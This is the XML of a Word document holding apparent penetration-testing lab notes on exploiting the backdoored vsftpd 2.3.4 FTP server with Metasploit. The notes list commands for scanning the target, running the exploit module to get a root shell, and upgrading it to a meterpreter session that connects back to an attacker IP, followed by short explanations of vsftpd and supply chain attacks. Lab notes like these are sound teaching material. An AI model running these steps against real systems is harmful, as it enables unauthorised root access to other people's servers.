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5D683" w14:textId="0920D269" w:rsidR="002B7959" w:rsidRPr="00911677" w:rsidRDefault="002B7959">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B7959">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Exploiting A Vulnerable FTP Server</w:t>
      </w:r>
      <w:r w:rsidRPr="002B7959">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12FF9E39" w14:textId="26E4FA28" w:rsidR="002B7959" w:rsidRDefault="002B7959">
      <w:r>
        <w:t>File transfer protocol: 21</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5508421A" w14:textId="75A3746D" w:rsidR="002B7959" w:rsidRDefault="002B7959">
      <w:r>
        <w:t>File sharing between servers and client/clients.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EB1554A" w14:textId="77777777" w:rsidR="002B7959" w:rsidRDefault="002B7959"/>
    <w:p w14:paraId="6E4CB0D6" w14:textId="243090D2" w:rsidR="002B7959" w:rsidRDefault="002B7959">
      <w:r>
        <w:t>Vsftpd = unix-like systems</w:t>
      </w:r>
      <w:r w:rsidR="001B1EC4">
        <w:t xml:space="preserve"> like kali linux.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C17E4A4" w14:textId="3E82BAA5" w:rsidR="002B7959" w:rsidRDefault="002B7959">
      <w:r>
        <w:t>Default ftp = ubuntu, centos and fedora.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C2826D6" w14:textId="77777777" w:rsidR="002B7959" w:rsidRDefault="002B7959"/>
    <w:p w14:paraId="6AD6DCFF" w14:textId="03FB46B5" w:rsidR="002B7959" w:rsidRDefault="002B7959">
      <w:r>
        <w:t>Vsftpd v2.3.4 is vuln to command execution supported by malicious backdoor added to vsftpd download archive through supply chain attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42B116EC" w14:textId="77777777" w:rsidR="001B47A8" w:rsidRDefault="001B47A8"/>
    <w:p w14:paraId="33A985C1" w14:textId="0D723A15" w:rsidR="000B6200" w:rsidRPr="000B6200" w:rsidRDefault="000B6200">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B6200">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Demo:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7425757E" w14:textId="7CBF12F4" w:rsidR="000B6200" w:rsidRDefault="000B6200">
      <w:r>
        <w:t>Ifconfig</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39339BF5" w14:textId="5D4B41B6" w:rsidR="000B6200" w:rsidRDefault="000B6200">
      <w:r>
        <w:t>Service postgresql start</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F06CB6C" w14:textId="60608031" w:rsidR="000B6200" w:rsidRDefault="000B6200">
      <w:r>
        <w:t>Msfconsole -q</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DE59124" w14:textId="26D038EB" w:rsidR="000B6200" w:rsidRDefault="000B6200">
      <w:r>
        <w:t>Workspace -a vsftpd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="177DBE75" w14:textId="0930A7E4" w:rsidR="000B6200" w:rsidRDefault="000B6200">
      <w:r>
        <w:t>Setg RHOSTS target_ip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04A79813" w14:textId="77EE24B8" w:rsidR="000B6200" w:rsidRDefault="000B6200">
      <w:r>
        <w:t>Workspace</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="535D7E00" w14:textId="56714E94" w:rsidR="000B6200" w:rsidRDefault="000B6200">
      <w:r>
        <w:t>Db_nmap -</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>sS  -</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>sV -</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>O  Target</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>_ip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="630922BE" w14:textId="2BE5A02E" w:rsidR="000B6200" w:rsidRDefault="000B6200">
      <w:r>
        <w:t>Services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03F4A292" w14:textId="664E6921" w:rsidR="000B6200" w:rsidRDefault="000B6200">
      <w:r>
        <w:t>Vulns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CBD72F9" w14:textId="20E268B6" w:rsidR="000B6200" w:rsidRDefault="000B6200">
      <w:r>
        <w:t xml:space="preserve">Analyze </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7841B4DA" w14:textId="7857B730" w:rsidR="000B6200" w:rsidRDefault="000B6200" w:rsidP="0007260B">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3776"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"># in some </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>cases</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> this command</w:t>
      </w:r>
      <w:r w:rsidR="0007260B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="0007260B">
        <w:t>doesnot</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="0007260B">
        <w:t xml:space="preserve"> work.</w:t>
      </w:r>
      <w:r w:rsidR="0007260B">
        <w:tab/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E992286" w14:textId="00E262C5" w:rsidR="000B6200" w:rsidRDefault="000B6200">
      <w:r>
        <w:t>#</w:t>
      </w:r>
      <w:r w:rsidRPr="000B6200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0B6200">
        <w:t>analyze</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000B6200">
        <w:t xml:space="preserve"> command in msfconsole looks at what Metasploit already knows about hosts (OS, open ports, services, etc.) from the database and </w:t>
      </w:r>
      <w:r w:rsidRPr="000B6200">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>suggests modules</w:t>
      </w:r>
      <w:r w:rsidRPr="000B6200">
        <w:t xml:space="preserve"> (scanners, auxiliary checks, or exploits) that you might run next.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28A047F3" w14:textId="77777777" w:rsidR="002B7959" w:rsidRDefault="002B7959"/>
    <w:p w14:paraId="7E0C62EA" w14:textId="6E36F201" w:rsidR="000B6200" w:rsidRDefault="0007260B">
      <w:r>
        <w:t xml:space="preserve">Search vsftpd </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A6C9BA6" w14:textId="091D692C" w:rsidR="0007260B" w:rsidRDefault="0007260B">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Use(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>index no/name)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02E23BEC" w14:textId="63BB7D79" w:rsidR="0007260B" w:rsidRDefault="0007260B">
      <w:r>
        <w:t>Show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D51BF15" w14:textId="2FFABC1C" w:rsidR="0007260B" w:rsidRDefault="0007260B">
      <w:r>
        <w:t xml:space="preserve">Info </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="005AAEB0" w14:textId="5192793E" w:rsidR="0007260B" w:rsidRDefault="0007260B">
      <w:r>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>show</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> more info about the module</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33692439" w14:textId="77777777" w:rsidR="0007260B" w:rsidRDefault="0007260B"/>
    <w:p w14:paraId="379B9DFA" w14:textId="50580807" w:rsidR="0007260B" w:rsidRDefault="0007260B">
      <w:r>
        <w:t>Run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1306C995" w14:textId="560A6CFE" w:rsidR="0007260B" w:rsidRDefault="0007260B">
      <w:r>
        <w:t># we get the command shell session</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61C09AFA" w14:textId="3660E968" w:rsidR="0007260B" w:rsidRDefault="0007260B">
      <w:r>
        <w:t>Ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="512D9AB5" w14:textId="084305B9" w:rsidR="0007260B" w:rsidRDefault="0007260B">
      <w:r>
        <w:t>/bin/bash -i</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D5EBB07" w14:textId="151273EB" w:rsidR="0007260B" w:rsidRDefault="0007260B">
      <w:r>
        <w:t>#</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>open</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> the bash </w:t>
      </w:r>
      <w:r w:rsidR="00AD17EE">
        <w:t>terminal on</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58398F9E" w14:textId="77777777" w:rsidR="0007260B" w:rsidRDefault="0007260B"/>
    <w:p w14:paraId="77C508DA" w14:textId="5D591CD1" w:rsidR="0007260B" w:rsidRPr="0007260B" w:rsidRDefault="0007260B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0007260B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>#Upgrade to meterpreter by background that session:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77E29F2B" w14:textId="77777777" w:rsidR="0007260B" w:rsidRDefault="0007260B"/>
    <w:p w14:paraId="032655C4" w14:textId="09E02B1D" w:rsidR="0007260B" w:rsidRDefault="0007260B">
      <w:r>
        <w:t>Ctrl+z</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53823F53" w14:textId="433B7ACC" w:rsidR="0007260B" w:rsidRDefault="0007260B">
      <w:r>
        <w:t>Sessions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="253EDDB5" w14:textId="074D7A00" w:rsidR="0007260B" w:rsidRDefault="0007260B">
      <w:r>
        <w:t>Search shell_to_meterpreter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47BEB946" w14:textId="5B80E060" w:rsidR="0007260B" w:rsidRDefault="0007260B">
      <w:r>
        <w:t>Use (index no)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CDE0625" w14:textId="00F5F315" w:rsidR="0007260B" w:rsidRDefault="0007260B">
      <w:r>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>this</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> is the post exploitation module</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ACB11A7" w14:textId="0F033A4C" w:rsidR="0007260B" w:rsidRDefault="0007260B">
      <w:r>
        <w:t>Options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F932DA2" w14:textId="399B31C2" w:rsidR="0007260B" w:rsidRDefault="0007260B">
      <w:r>
        <w:t>Set LHOST attacker_ip/set LHOST eth1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C1DAFBC" w14:textId="106A4AFA" w:rsidR="0007260B" w:rsidRDefault="0007260B">
      <w:r>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>set</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> LHOST eth1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> this will set automatically to the ip of ethernet 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0310755A" w14:textId="77777777" w:rsidR="0007260B" w:rsidRDefault="0007260B"/>
    <w:p w14:paraId="37743847" w14:textId="172B657A" w:rsidR="0007260B" w:rsidRDefault="0007260B">
      <w:r>
        <w:t>Set Session (number)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2523B658" w14:textId="13CDCAD6" w:rsidR="0007260B" w:rsidRDefault="0007260B">
      <w:r>
        <w:t>Run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D141976" w14:textId="74DA5FDA" w:rsidR="0007260B" w:rsidRDefault="0007260B">
      <w:r>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>now</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> we get the meterpreter </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>session ,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> it sometime </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>give</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> the error but run successfully</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18A76815" w14:textId="0EBA8EC2" w:rsidR="0007260B" w:rsidRDefault="0007260B">
      <w:r>
        <w:t>Sessi</w:t>
      </w:r>
      <w:r w:rsidR="00AD17EE">
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>ns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BCBE86C" w14:textId="3478CE2F" w:rsidR="0007260B" w:rsidRDefault="0007260B">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Sessions -i 2 /session 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="789392CD" w14:textId="77777777" w:rsidR="0007260B" w:rsidRDefault="0007260B"/>
    <w:p w14:paraId="0313134E" w14:textId="45407779" w:rsidR="0007260B" w:rsidRDefault="0007260B">
      <w:r>
        <w:t xml:space="preserve">Sysinfo </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EFEC397" w14:textId="48911A7C" w:rsidR="0007260B" w:rsidRDefault="0007260B">
      <w:r>
        <w:t xml:space="preserve">Getuid </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21A843A5" w14:textId="24D83B19" w:rsidR="0007260B" w:rsidRDefault="0007260B">
      <w:r>
        <w:t xml:space="preserve"># uid=0 where 0’s means it is root </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>user</w:t>
      </w:r>
      <w:r w:rsidR="00DE04C0">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00DE04C0">
        <w:t>privileged user)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60884C44" w14:textId="4408977C" w:rsidR="001B47A8" w:rsidRDefault="001B47A8"/>
    <w:p w14:paraId="7F4C7AF2" w14:textId="3BC67355" w:rsidR="001B47A8" w:rsidRDefault="001B47A8">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B47A8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Note:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5389E4BC" w14:textId="77777777" w:rsidR="000B6200" w:rsidRPr="000B6200" w:rsidRDefault="000B6200" w:rsidP="000B6200">
      <w:r w:rsidRPr="000B6200">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Vsftpd</w:t>
      </w:r>
      <w:r w:rsidRPr="000B6200">
        <w:t xml:space="preserve"> stands for </w:t>
      </w:r>
      <w:r w:rsidRPr="000B6200">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Very Secure File Transfer Protocol Daemon</w:t>
      </w:r>
      <w:r w:rsidRPr="000B6200">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C18E5BF" w14:textId="77777777" w:rsidR="000B6200" w:rsidRPr="000B6200" w:rsidRDefault="000B6200" w:rsidP="000B6200">
      <w:r w:rsidRPr="000B6200">
        <w:t>In simple words:</w:t>
      </w:r>
      <w:r w:rsidRPr="000B6200">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="000B6200">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>➡️</w:t>
      </w:r>
      <w:r w:rsidRPr="000B6200">
        <w:t xml:space="preserve"> It’s a </w:t>
      </w:r>
      <w:r w:rsidRPr="000B6200">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>program (server)</w:t>
      </w:r>
      <w:r w:rsidRPr="000B6200">
        <w:t xml:space="preserve"> used on Linux systems to let users </w:t>
      </w:r>
      <w:r w:rsidRPr="000B6200">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>transfer files</w:t>
      </w:r>
      <w:r w:rsidRPr="000B6200">
        <w:t xml:space="preserve"> using </w:t>
      </w:r>
      <w:r w:rsidRPr="000B6200">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>FTP</w:t>
      </w:r>
      <w:r w:rsidRPr="000B6200">
        <w:t xml:space="preserve"> (File Transfer Protocol).</w:t>
      </w:r>
      <w:r w:rsidRPr="000B6200">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="000B6200">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>➡️</w:t>
      </w:r>
      <w:r w:rsidRPr="000B6200">
        <w:t xml:space="preserve"> “Daemon” means it runs in the background, waiting for FTP connections.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="447F4903" w14:textId="77777777" w:rsidR="000B6200" w:rsidRPr="000B6200" w:rsidRDefault="000B6200"/>
    <w:p w14:paraId="5A836097" w14:textId="77777777" w:rsidR="001B47A8" w:rsidRPr="001B47A8" w:rsidRDefault="001B47A8" w:rsidP="001B47A8">
      <w:r w:rsidRPr="001B47A8">
        <w:t xml:space="preserve">A </w:t>
      </w:r>
      <w:r w:rsidRPr="001B47A8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>supply chain attack</w:t>
      </w:r>
      <w:r w:rsidRPr="001B47A8">
        <w:t xml:space="preserve"> means attackers don’t attack you directly — instead, they </w:t>
      </w:r>
      <w:r w:rsidRPr="001B47A8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>infect the software or updates you download</w:t>
      </w:r>
      <w:r w:rsidRPr="001B47A8">
        <w:t xml:space="preserve"> from trusted sources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D1D63FB" w14:textId="77777777" w:rsidR="001B47A8" w:rsidRPr="001B47A8" w:rsidRDefault="001B47A8" w:rsidP="001B47A8">
      <w:r w:rsidRPr="001B47A8">
        <w:t>In simple words:</w:t>
      </w:r>
      <w:r w:rsidRPr="001B47A8">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001B47A8">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>➡️</w:t>
      </w:r>
      <w:r w:rsidRPr="001B47A8">
        <w:t xml:space="preserve"> Hackers break into the software maker’s system or website.</w:t>
      </w:r>
      <w:r w:rsidRPr="001B47A8">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001B47A8">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>➡️</w:t>
      </w:r>
      <w:r w:rsidRPr="001B47A8">
        <w:t xml:space="preserve"> They secretly add malicious code to the official software.</w:t>
      </w:r>
      <w:r w:rsidRPr="001B47A8">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001B47A8">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>➡️</w:t>
      </w:r>
      <w:r w:rsidRPr="001B47A8">
        <w:t xml:space="preserve"> When users download and install it, they unknowingly install the attacker’s backdoor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CC2E0C8" w14:textId="77777777" w:rsidR="001B47A8" w:rsidRDefault="001B47A8"/>
    <w:p w14:paraId="20FD79A8" w14:textId="77777777" w:rsidR="002B7959" w:rsidRDefault="002B7959"/>
    <w:sectPr w:rsidR="002B7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4B0"/>
    <w:rsid w:val="0007260B"/>
    <w:rsid w:val="000B6200"/>
    <w:rsid w:val="001B1EC4"/>
    <w:rsid w:val="001B47A8"/>
    <w:rsid w:val="002B18B7"/>
    <w:rsid w:val="002B7959"/>
    <w:rsid w:val="0038029C"/>
    <w:rsid w:val="004424B0"/>
    <w:rsid w:val="00551663"/>
    <w:rsid w:val="005662A9"/>
    <w:rsid w:val="00595B1E"/>
    <w:rsid w:val="00853ABF"/>
    <w:rsid w:val="00911677"/>
    <w:rsid w:val="00AD17EE"/>
    <w:rsid w:val="00DE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98AAD"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{57EDA246-F216-425D-AAFC-CD2A76D4A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4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289</Words>
  <Characters>1797</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>57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14</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-10-08T13:12:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-10-08T13:46:00Z</dcterms:modified>
</cp:coreProperties>
</file>